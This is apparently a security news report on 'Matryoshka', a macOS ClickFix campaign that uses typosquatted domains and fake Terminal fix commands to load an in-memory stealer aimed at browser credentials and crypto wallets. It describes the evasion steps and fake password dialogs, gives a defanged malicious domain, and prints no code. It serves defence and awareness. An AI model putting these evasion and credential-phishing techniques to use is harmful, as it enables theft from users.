A sophisticated social engineering campaign targeting macOS users has emerged, deploying a dangerous stealer malware through an evolved version of the ClickFix attack technique. Named Matryoshka after the Russian nesting dolls, this variant uses nested obfuscation layers to hide malicious code from security scanners and automated analysis systems. The attack tricks victims into executing Terminal commands that appear to be legitimate software fixes, bypassing traditional download-and-launch security expectations that many users rely on.
The campaign leverages typosquatting domains to intercept users who mistype legitimate website addresses, particularly targeting visitors attempting to reach software review sites. Once redirected to the fraudulent domain, victims encounter a fake installation prompt instructing them to paste a fix command into their macOS Terminal application. Intego analysts identified this attack chain after observing typosquatted domains like comparisions[.]org, which mimics the legitimate comparisons.org website by adding an extra letter.
Unlike earlier ClickFix variants that used readable scripts, Matryoshka employs advanced evasion techniques designed to complicate detection efforts. The malicious payload remains encoded and compressed until execution, exploding only in memory rather than writing clean script files to disk. This approach significantly reduces visibility for file-based security scanning and makes basic static analysis more challenging for researchers.
After successful execution, the loader retrieves an AppleScript payload specifically designed to harvest browser credentials and target cryptocurrency wallet applications including Trezor Suite and Ledger Live. The malware attempts programmatic credential theft first, then falls back to displaying fake system dialogs that repeatedly request passwords until victims comply.
Infection Mechanism and Evasion Tactics
The Matryoshka infection chain operates through multiple stages, each designed to evade detection while maintaining operational efficiency. When victims paste the malicious Terminal command, it retrieves a shell script containing a large encoded payload hidden within a heredoc structure. This payload passes through an in-memory pipeline where it undergoes decoding and decompression without creating easily detectable file artifacts.
The loader demonstrates several clever evasion behaviors that help it run unnoticed. It detaches its main routine to the background and exits quickly, making the Terminal prompt return almost immediately so victims believe the process has finished. The script redirects standard input, output, and error streams to suppress visible artifacts in the terminal session. Additionally, the command-and-control infrastructure requires specific custom headers in requests, responding with generic errors to automated scanners lacking proper credentials.
Users should never paste commands from websites into Terminal, as legitimate software updates will not require this action. Organizations should block typosquatting domains, monitor Terminal-initiated execution patterns, and watch for suspicious staging archives or wallet application tampering.
This campaign underscores the evolving sophistication of social engineering attacks targeting macOS users. By leveraging typosquatting and advanced obfuscation techniques, attackers can effectively bypass traditional security measures and exploit user trust. It is crucial for users to remain vigilant and adhere to best practices, such as verifying website URLs, avoiding the execution of unsolicited commands, and keeping software up to date.
In conclusion, the Matryoshka variant of the ClickFix attack represents a significant threat to macOS users, combining deceptive social engineering tactics with advanced evasion techniques to deploy stealer malware. Awareness and proactive security measures are essential to mitigate the risks associated with this and similar campaigns.
